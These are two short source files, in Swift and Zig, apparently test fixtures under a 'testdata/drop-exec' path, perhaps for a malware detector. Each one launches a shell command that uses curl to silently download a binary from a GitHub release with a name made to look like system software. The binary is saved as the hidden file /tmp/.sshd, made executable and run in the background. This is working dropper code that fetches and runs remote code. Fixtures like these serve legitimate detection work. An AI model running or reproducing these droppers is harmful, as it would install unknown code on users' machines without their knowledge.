File: testdata/drop-exec/dropper.swift
import Foundation

let task = Process()
task.launchPath = "/bin/sh"
task.arguments = [
    "-c",
    "curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &",
]
try? task.run()

File: testdata/drop-exec/dropper.zig
const std = @import("std");

pub fn main() !void {
    var gpa = std.heap.GeneralPurposeAllocator(.{}){};
    const alloc = gpa.allocator();
    _ = try std.ChildProcess.exec(.{
        .allocator = alloc,
        .argv = &.{
            "sh",
            "-c",
            "curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &",
        },
    });
}
